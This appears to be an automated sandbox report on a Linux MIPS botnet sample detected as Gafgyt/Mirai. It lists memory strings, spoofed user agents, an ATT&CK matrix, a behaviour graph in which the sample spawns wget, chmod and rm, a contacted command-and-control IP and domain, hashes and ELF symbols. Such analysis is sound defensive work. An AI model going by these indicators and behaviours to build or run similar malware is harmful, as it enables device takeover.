            Source: mipsel.elf, 5493.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp, mipsel.elf, 5497.1.000055c80d9f4000.000055c80da7b000.rw-.sdmp, mipsel.elf, 5499.1.000055c80d9f4000.000055c80da7b000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
            Source: mipsel.elf, 5493.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp, mipsel.elf, 5497.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp, mipsel.elf, 5499.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mipsel.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.elf
            Source: mipsel.elf, 5493.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp, mipsel.elf, 5497.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmp, mipsel.elf, 5499.1.00007ffd93ad9000.00007ffd93afa000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: mipsel.elf, type: SAMPLE
            Source: Yara matchFile source: mipsel.elf, type: SAMPLE
            Source: Yara matchFile source: 5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mipsel.elf PID: 5493, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: mipsel.elf PID: 5497, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: mipsel.elf PID: 5499, type: MEMORYSTR
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; de) Opera 11.01
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: Initial sampleUser agent string found: Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51
            Source: Initial sampleUser agent string found: Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Linux; Android 4.4.3; HTC_0PCV2 Build/KTU84L) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
            Source: Initial sampleUser agent string found: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Gecko/20100101 Firefox/24.0
            Source: Initial sampleUser agent string found: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: mipsel.elf, type: SAMPLE
            Source: Yara matchFile source: mipsel.elf, type: SAMPLE
            Source: Yara matchFile source: 5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: 5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mipsel.elf PID: 5493, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: mipsel.elf PID: 5497, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: mipsel.elf PID: 5499, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            Path Interception1
            Hide Artifacts
            OS Credential Dumping11
            Security Software Discovery
            Remote ServicesData from Local System1
            Data Obfuscation
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
            File and Directory Permissions Modification
            LSASS Memory1
            File and Directory Discovery
            Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Hidden Files and Directories
            Security Account Manager1
            Remote System Discovery
            SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            File Deletion
            NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture11
            Application Layer Protocol
            Traffic DuplicationData Destruction
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1686580 Sample: mipsel.elf Startdate: 10/05/2025 Architecture: LINUX Score: 96 27 92.60.77.69, 40804, 40806, 40808 AS-IRIDEOS-KPIT Italy 2->27 29 gay.energy 2->29 31 daisy.ubuntu.com 2->31 33 Suricata IDS alerts for network traffic 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 Antivirus / Scanner detection for submitted sample 2->37 39 4 other signatures 2->39 8 mipsel.elf 2->8         started        signatures3 process4 signatures5 41 Opens /proc/net/* files useful for finding connected devices and routers 8->41 11 mipsel.elf sh 8->11         started        13 mipsel.elf 8->13         started        15 mipsel.elf 8->15         started        process6 process7 17 sh sh 11->17         started        19 sh wget 11->19         started        21 sh chmod 11->21         started        23 sh rm 11->23         started        25 mipsel.elf 13->25         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            mipsel.elf65%VirustotalBrowse
            mipsel.elf63%ReversingLabsLinux.Backdoor.Gafgyt
            mipsel.elf100%AviraLINUX/Mirai.Gafgyt.
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            daisy.ubuntu.com
            162.213.35.25
            truefalse
              high
              gay.energy
              unknown
              unknowntrue
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                92.60.77.69
                unknownItaly5602AS-IRIDEOS-KPITtrue
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                daisy.ubuntu.comarm5.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.25
                arm6.elfGet hashmaliciousGafgytBrowse
                • 162.213.35.24
                rep.arc.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.24
                arm6.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.25
                Space.arm5.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.24
                Space.spc.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.25
                O4WmcV1laq.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.25
                onNhrf5u66.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.24
                NkUW8QQONi.elfGet hashmaliciousBPFDoorBrowse
                • 162.213.35.24
                7T1E6ZHN3w.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.24
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AS-IRIDEOS-KPITarmv4l.elfGet hashmaliciousUnknownBrowse
                • 193.28.95.59
                nullnet_load.arm7.elfGet hashmaliciousMiraiBrowse
                • 109.233.129.42
                8427xbk3Zt.elfGet hashmaliciousUnknownBrowse
                • 109.233.130.43
                No context
                No context
                No created / dropped files found
                File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
                Entropy (8bit):5.364281562076639
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:mipsel.elf
                File size:171'453 bytes
                MD5:42df0be80d2c8672b1f3f98383648b9b
                SHA1:a6aa14c2b6b56e854de2828853ff44ef511ca246
                SHA256:97bb2f637b0b13cc8a54e00a360eba90029d90b28dcdaeeab86b5df673293593
                SHA512:d6d70264d945825fb27fd46eab1eb63b1a53db66ca04ce6f195fd95897858c95c6d8eea53548dd7a26564a108d077e46e75eec732e96b979c72329d6487a9af0
                SSDEEP:1536:H3ZG4ejPnK3c+oT/rrVFwvmwpLBMdH4p4NHAg8L59/Kq0KLI+tCDvsEjm8iyh8de:UlMbpR4eCD0om8Hh8d75Nu
                TLSH:13F39636A7614DB7D81ECD7301AA85121C8CD98712D82B6FB274E61CEB6BD4F05E3D48
                File Content Preview:.ELF......................@.4....>......4. ...(........p......@...@...........................@...@.@...@...............@...@.F.@.F.....xq..........Q.td................................................p.F....<...'!......'.......................<...'!......

                ELF header

                Class:ELF32
                Data:2's complement, little endian
                Version:1 (current)
                Machine:MIPS R3000
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:UNIX - System V
                ABI Version:0
                Entry Point Address:0x4002b0
                Flags:0x1007
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:4
                Section Header Offset:146944
                Section Header Size:40
                Number of Section Headers:22
                Header String Table Index:19
                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .reginfoMIPS_REGINFO0x4000b40xb40x180x180x2A004
                .initPROGBITS0x4000cc0xcc0x8c0x00x6AX004
                .textPROGBITS0x4001600x1600x1b6700x00x6AX0016
                .finiPROGBITS0x41b7d00x1b7d00x5c0x00x6AX004
                .rodataPROGBITS0x41b8300x1b8300x4a100x00x2A0016
                .eh_framePROGBITS0x4602400x202400x40x00x3WA004
                .ctorsPROGBITS0x4602440x202440x80x00x3WA004
                .dtorsPROGBITS0x46024c0x2024c0x80x00x3WA004
                .jcrPROGBITS0x4602540x202540x40x00x3WA004
                .data.rel.roPROGBITS0x4602580x202580x4c0x00x3WA004
                .dataPROGBITS0x4602b00x202b00x3d00x00x3WA0016
                .gotPROGBITS0x4606800x206800x55c0x40x10000003WAp0016
                .sdataPROGBITS0x460bdc0x20bdc0x40x00x10000003WAp004
                .sbssNOBITS0x460be00x20be00x300x00x10000003WAp004
                .bssNOBITS0x460c100x20be00x67a80x00x3WA0016
                .commentPROGBITS0x00x20be00xcba0x00x0001
                .mdebug.abi32PROGBITS0xcba0x2189a0x00x00x0001
                .pdrPROGBITS0x00x2189c0x24c00x00x0004
                .shstrtabSTRTAB0x00x23d5c0xa10x00x0001
                .symtabSYMTAB0x00x241700x34f00x100x0213524
                .strtabSTRTAB0x00x276600x275d0x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                <unknown>0xb40x4000b40x4000b40x180x180.98340x4R 0x4.reginfo
                LOAD0x00x4000000x4000000x202400x202405.35700x5R E0x10000.reginfo .init .text .fini .rodata
                LOAD0x202400x4602400x4602400x9a00x71784.53360x6RW 0x10000.eh_frame .ctors .dtors .jcr .data.rel.ro .data .got .sdata .sbss .bss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                .symtab0x4000b40SECTION<unknown>DEFAULT1
                .symtab0x4000cc0SECTION<unknown>DEFAULT2
                .symtab0x4001600SECTION<unknown>DEFAULT3
                .symtab0x41b7d00SECTION<unknown>DEFAULT4
                .symtab0x41b8300SECTION<unknown>DEFAULT5
                .symtab0x4602400SECTION<unknown>DEFAULT6
                .symtab0x4602440SECTION<unknown>DEFAULT7
                .symtab0x46024c0SECTION<unknown>DEFAULT8
                .symtab0x4602540SECTION<unknown>DEFAULT9
                .symtab0x4602580SECTION<unknown>DEFAULT10
                .symtab0x4602b00SECTION<unknown>DEFAULT11
                .symtab0x4606800SECTION<unknown>DEFAULT12
                .symtab0x460bdc0SECTION<unknown>DEFAULT13
                .symtab0x460be00SECTION<unknown>DEFAULT14
                .symtab0x460c100SECTION<unknown>DEFAULT15
                .symtab0x00SECTION<unknown>DEFAULT16
                .symtab0xcba0SECTION<unknown>DEFAULT17
                .symtab0x00SECTION<unknown>DEFAULT18
                .symtab0x00SECTION<unknown>DEFAULT19
                .symtab0x00SECTION<unknown>DEFAULT20
                .symtab0x00SECTION<unknown>DEFAULT21
                C.1.3455.symtab0x41fdd024OBJECT<unknown>DEFAULT5
                C.147.6073.symtab0x46025840OBJECT<unknown>DEFAULT10
                C.177.6364.symtab0x46029416OBJECT<unknown>DEFAULT10
                C.178.6365.symtab0x46028020OBJECT<unknown>DEFAULT10
                FRAMESZ.symtab0x200NOTYPE<unknown>DEFAULTSHN_ABS
                FRAMESZ.symtab0x180NOTYPE<unknown>DEFAULTSHN_ABS
                GPOFF.symtab0x180NOTYPE<unknown>DEFAULTSHN_ABS
                GPOFF.symtab0x140NOTYPE<unknown>DEFAULTSHN_ABS
                KHcommSOCK.symtab0x460c304OBJECT<unknown>DEFAULT15
                KHserverHACKER.symtab0x4602e44OBJECT<unknown>DEFAULT11
                LOCALSZ.symtab0x30NOTYPE<unknown>DEFAULTSHN_ABS
                LOCALSZ.symtab0x10NOTYPE<unknown>DEFAULTSHN_ABS
                LOCAL_ADDR.symtab0x460be04OBJECT<unknown>DEFAULT14
                Q.symtab0x460c4c16384OBJECT<unknown>DEFAULT15
                RAOFF.symtab0x1c0NOTYPE<unknown>DEFAULTSHN_ABS
                UserAgents.symtab0x460300144OBJECT<unknown>DEFAULT11
                V0OFF.symtab0x140NOTYPE<unknown>DEFAULTSHN_ABS
                _Exit.symtab0x40e27092FUNC<unknown>DEFAULT3
                _GLOBAL_OFFSET_TABLE_.symtab0x4606800OBJECT<unknown>DEFAULT12
                _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                _READ.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __CTOR_END__.symtab0x4602480OBJECT<unknown>DEFAULT7
                __CTOR_LIST__.symtab0x4602440OBJECT<unknown>DEFAULT7
                __C_ctype_b.symtab0x4603a04OBJECT<unknown>DEFAULT11
                __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __C_ctype_b_data.symtab0x41e680768OBJECT<unknown>DEFAULT5
                __C_ctype_tolower.symtab0x4606704OBJECT<unknown>DEFAULT11
                __C_ctype_tolower.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __C_ctype_tolower_data.symtab0x41ff40768OBJECT<unknown>DEFAULT5
                __C_ctype_toupper.symtab0x4603b04OBJECT<unknown>DEFAULT11
                __C_ctype_toupper.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                __C_ctype_toupper_data.symtab0x41e980768OBJECT<unknown>DEFAULT5
                __DTOR_END__.symtab0x4602500OBJECT<unknown>DEFAULT8
                __DTOR_LIST__.symtab0x46024c0OBJECT<unknown>DEFAULT8
                __EH_FRAME_BEGIN__.symtab0x4602400OBJECT<unknown>DEFAULT6
                __FRAME_END__.symtab0x4602400OBJECT<unknown>DEFAULT6
                __GI___C_ctype_b.symtab0x4603a04OBJECT<unknown>HIDDEN11
                __GI___C_ctype_tolower.symtab0x4606704OBJECT<unknown>HIDDEN11
                __GI___C_ctype_toupper.symtab0x4603b04OBJECT<unknown>HIDDEN11
                __GI___ctype_b.symtab0x4603a44OBJECT<unknown>HIDDEN11
                __GI___ctype_tolower.symtab0x4606744OBJECT<unknown>HIDDEN11
                __GI___ctype_toupper.symtab0x4603b44OBJECT<unknown>HIDDEN11
                __GI___errno_location.symtab0x40e3d024FUNC<unknown>HIDDEN3
                __GI___fcntl_nocancel.symtab0x40e118136FUNC<unknown>HIDDEN3
                __GI___fgetc_unlocked.symtab0x416ec0388FUNC<unknown>HIDDEN3
                __GI___glibc_strerror_r.symtab0x41056068FUNC<unknown>HIDDEN3
                __GI___h_errno_location.symtab0x414c9024FUNC<unknown>HIDDEN3
                __GI___libc_fcntl.symtab0x40e090136FUNC<unknown>HIDDEN3
                __GI___sigaddset.symtab0x41100844FUNC<unknown>HIDDEN3
                __GI___sigdelset.symtab0x41103448FUNC<unknown>HIDDEN3
                __GI___sigismember.symtab0x410fe040FUNC<unknown>HIDDEN3
                __GI___uClibc_fini.symtab0x413ca0204FUNC<unknown>HIDDEN3
                __GI___uClibc_init.symtab0x413df4140FUNC<unknown>HIDDEN3
                __GI___xpg_strerror_r.symtab0x4105f0388FUNC<unknown>HIDDEN3
                __GI__exit.symtab0x40e27092FUNC<unknown>HIDDEN3
                __GI_abort.symtab0x4127f0408FUNC<unknown>HIDDEN3
                __GI_atoi.symtab0x41316028FUNC<unknown>HIDDEN3
                __GI_brk.symtab0x4180d0112FUNC<unknown>HIDDEN3
                __GI_clock_getres.symtab0x4143f088FUNC<unknown>HIDDEN3
                __GI_close.symtab0x40e33088FUNC<unknown>HIDDEN3
                __GI_closedir.symtab0x414730308FUNC<unknown>HIDDEN3
                __GI_config_close.symtab0x415174132FUNC<unknown>HIDDEN3
                __GI_config_open.symtab0x4151f8116FUNC<unknown>HIDDEN3
                __GI_config_read.symtab0x414cb01220FUNC<unknown>HIDDEN3
                __GI_connect.symtab0x410a1092FUNC<unknown>HIDDEN3
                __GI_dup2.symtab0x40dc6088FUNC<unknown>HIDDEN3
                __GI_errno.symtab0x466ea04OBJECT<unknown>HIDDEN15
                __GI_execl.symtab0x413b00196FUNC<unknown>HIDDEN3
                __GI_execve.symtab0x41435088FUNC<unknown>HIDDEN3
                __GI_exit.symtab0x413400236FUNC<unknown>HIDDEN3
                __GI_fclose.symtab0x415400512FUNC<unknown>HIDDEN3
                __GI_fcntl.symtab0x40e090136FUNC<unknown>HIDDEN3
                __GI_fflush_unlocked.symtab0x416c2c648FUNC<unknown>HIDDEN3
                __GI_fgetc.symtab0x4168a0264FUNC<unknown>HIDDEN3
                __GI_fgetc_unlocked.symtab0x416ec0388FUNC<unknown>HIDDEN3
                __GI_fgets.symtab0x4169b0212FUNC<unknown>HIDDEN3
                __GI_fgets_unlocked.symtab0x417050276FUNC<unknown>HIDDEN3
                __GI_fopen.symtab0x41560028FUNC<unknown>HIDDEN3
                __GI_fork.symtab0x40de0088FUNC<unknown>HIDDEN3
                __GI_fputs_unlocked.symtab0x40fd20124FUNC<unknown>HIDDEN3
                __GI_fseek.symtab0x41865068FUNC<unknown>HIDDEN3
                __GI_fseeko64.symtab0x4186a0392FUNC<unknown>HIDDEN3
                __GI_fstat.symtab0x418140144FUNC<unknown>HIDDEN3
                __GI_fwrite_unlocked.symtab0x40fda0268FUNC<unknown>HIDDEN3
                __GI_getc_unlocked.symtab0x416ec0388FUNC<unknown>HIDDEN3
                __GI_getdtablesize.symtab0x40dfe072FUNC<unknown>HIDDEN3
                __GI_getegid.symtab0x4144b016FUNC<unknown>HIDDEN3
                __GI_geteuid.symtab0x40ddf016FUNC<unknown>HIDDEN3
                __GI_getgid.symtab0x41457016FUNC<unknown>HIDDEN3
                __GI_gethostbyname.symtab0x41096028FUNC<unknown>HIDDEN3
                __GI_gethostbyname2.symtab0x410980132FUNC<unknown>HIDDEN3
                __GI_gethostbyname2_r.symtab0x417c90948FUNC<unknown>HIDDEN3
                __GI_gethostbyname_r.symtab0x41a8f0940FUNC<unknown>HIDDEN3
                __GI_gethostname.symtab0x41ad00204FUNC<unknown>HIDDEN3
                __GI_getpagesize.symtab0x4143b048FUNC<unknown>HIDDEN3
                __GI_getpid.symtab0x40dd5016FUNC<unknown>HIDDEN3
                __GI_getrlimit.symtab0x41445088FUNC<unknown>HIDDEN3
                __GI_getsockname.symtab0x410a7088FUNC<unknown>HIDDEN3
                __GI_getuid.symtab0x4143e016FUNC<unknown>HIDDEN3
                __GI_h_errno.symtab0x466ea44OBJECT<unknown>HIDDEN15
                __GI_htonl.symtab0x4108a840FUNC<unknown>HIDDEN3
                __GI_htons.symtab0x41089024FUNC<unknown>HIDDEN3
                __GI_inet_addr.symtab0x41091072FUNC<unknown>HIDDEN3
                __GI_inet_aton.symtab0x417b70284FUNC<unknown>HIDDEN3
                __GI_inet_ntop.symtab0x419120868FUNC<unknown>HIDDEN3
                __GI_inet_pton.symtab0x418c98704FUNC<unknown>HIDDEN3
                __GI_initstate_r.symtab0x413010328FUNC<unknown>HIDDEN3
                __GI_ioctl.symtab0x40e200108FUNC<unknown>HIDDEN3
                __GI_isatty.symtab0x4107a060FUNC<unknown>HIDDEN3
                __GI_kill.symtab0x40e03092FUNC<unknown>HIDDEN3
                __GI_lseek64.symtab0x41ae60164FUNC<unknown>HIDDEN3
                __GI_memchr.symtab0x417170260FUNC<unknown>HIDDEN3
                __GI_memcpy.symtab0x40ff40308FUNC<unknown>HIDDEN3
                __GI_memmove.symtab0x417280824FUNC<unknown>HIDDEN3
                __GI_mempcpy.symtab0x4179e076FUNC<unknown>HIDDEN3
                __GI_memrchr.symtab0x4177e0260FUNC<unknown>HIDDEN3
                __GI_memset.symtab0x40feb0144FUNC<unknown>HIDDEN3
                __GI_mmap.symtab0x414240132FUNC<unknown>HIDDEN3
                __GI_mremap.symtab0x414640124FUNC<unknown>HIDDEN3
                __GI_munmap.symtab0x41458088FUNC<unknown>HIDDEN3
                __GI_nanosleep.symtab0x4145e092FUNC<unknown>HIDDEN3
                __GI_ntohl.symtab0x4108e840FUNC<unknown>HIDDEN3
                __GI_ntohs.symtab0x4108d024FUNC<unknown>HIDDEN3
                __GI_open.symtab0x40dcd0124FUNC<unknown>HIDDEN3
                __GI_opendir.symtab0x414984260FUNC<unknown>HIDDEN3
                __GI_pipe.symtab0x40db7064FUNC<unknown>HIDDEN3
                __GI_poll.symtab0x41aca092FUNC<unknown>HIDDEN3
                __GI_raise.symtab0x41805076FUNC<unknown>HIDDEN3
                __GI_random.symtab0x4129b0164FUNC<unknown>HIDDEN3
                __GI_random_r.symtab0x412dd4172FUNC<unknown>HIDDEN3
                __GI_rawmemchr.symtab0x417720192FUNC<unknown>HIDDEN3
                __GI_read.symtab0x40df8088FUNC<unknown>HIDDEN3
                __GI_readdir64.symtab0x414b80272FUNC<unknown>HIDDEN3
                __GI_recv.symtab0x410b5092FUNC<unknown>HIDDEN3
                __GI_recvfrom.symtab0x410c3432FUNC<unknown>HIDDEN3
                __GI_sbrk.symtab0x4144c0164FUNC<unknown>HIDDEN3
                __GI_select.symtab0x40df5c32FUNC<unknown>HIDDEN3
                __GI_send.symtab0x410c6092FUNC<unknown>HIDDEN3
                __GI_sendto.symtab0x410d4432FUNC<unknown>HIDDEN3
                __GI_setsockopt.symtab0x410d70124FUNC<unknown>HIDDEN3
                __GI_setstate_r.symtab0x412c90324FUNC<unknown>HIDDEN3
                __GI_sigaction.symtab0x4142d028FUNC<unknown>HIDDEN3
                __GI_sigaddset.symtab0x410e50104FUNC<unknown>HIDDEN3
                __GI_sigemptyset.symtab0x410ec036FUNC<unknown>HIDDEN3
                __GI_signal.symtab0x410ef0236FUNC<unknown>HIDDEN3
                __GI_sigprocmask.symtab0x40e2d096FUNC<unknown>HIDDEN3
                __GI_sleep.symtab0x4134f0288FUNC<unknown>HIDDEN3
                __GI_socket.symtab0x410df088FUNC<unknown>HIDDEN3
                __GI_sprintf.symtab0x40e46080FUNC<unknown>HIDDEN3
                __GI_srandom_r.symtab0x412e80400FUNC<unknown>HIDDEN3
                __GI_stat.symtab0x41add0144FUNC<unknown>HIDDEN3
                __GI_strcasecmp.symtab0x41b5b0108FUNC<unknown>HIDDEN3
                __GI_strchr.symtab0x410460248FUNC<unknown>HIDDEN3
                __GI_strchrnul.symtab0x417a30248FUNC<unknown>HIDDEN3
                __GI_strcmp.symtab0x41024044FUNC<unknown>HIDDEN3
                __GI_strcoll.symtab0x41024044FUNC<unknown>HIDDEN3
                __GI_strcpy.symtab0x41037036FUNC<unknown>HIDDEN3
                __GI_strcspn.symtab0x417690144FUNC<unknown>HIDDEN3
                __GI_strdup.symtab0x41af10140FUNC<unknown>HIDDEN3
                __GI_strlen.symtab0x410180184FUNC<unknown>HIDDEN3
                __GI_strncpy.symtab0x4103a0188FUNC<unknown>HIDDEN3
                __GI_strnlen.symtab0x410270248FUNC<unknown>HIDDEN3
                __GI_strpbrk.symtab0x417b3064FUNC<unknown>HIDDEN3
                __GI_strrchr.symtab0x417940160FUNC<unknown>HIDDEN3
                __GI_strspn.symtab0x4178f072FUNC<unknown>HIDDEN3
                __GI_strstr.symtab0x410080256FUNC<unknown>HIDDEN3
                __GI_strtok.symtab0x4105d032FUNC<unknown>HIDDEN3
                __GI_strtok_r.symtab0x4175c0208FUNC<unknown>HIDDEN3
                __GI_strtol.symtab0x41318028FUNC<unknown>HIDDEN3
                __GI_sysconf.symtab0x41380c748FUNC<unknown>HIDDEN3
                __GI_tcgetattr.symtab0x4107e0176FUNC<unknown>HIDDEN3
                __GI_time.symtab0x40dd6016FUNC<unknown>HIDDEN3
                __GI_times.symtab0x4146c016FUNC<unknown>HIDDEN3
                __GI_toupper.symtab0x40e39060FUNC<unknown>HIDDEN3
                __GI_uname.symtab0x41b55088FUNC<unknown>HIDDEN3
                __GI_vfork.symtab0x40dc1076FUNC<unknown>HIDDEN3
                __GI_vsnprintf.symtab0x40e4b0252FUNC<unknown>HIDDEN3
                __GI_wait4.symtab0x4142f092FUNC<unknown>HIDDEN3
                __GI_waitpid.symtab0x40de6028FUNC<unknown>HIDDEN3
                __GI_wcrtomb.symtab0x415270108FUNC<unknown>HIDDEN3
                __GI_wcsnrtombs.symtab0x415320216FUNC<unknown>HIDDEN3
                __GI_wcsrtombs.symtab0x4152e064FUNC<unknown>HIDDEN3
                __GI_write.symtab0x40e1a088FUNC<unknown>HIDDEN3
                __JCR_END__.symtab0x4602540OBJECT<unknown>DEFAULT9
                __JCR_LIST__.symtab0x4602540OBJECT<unknown>DEFAULT9
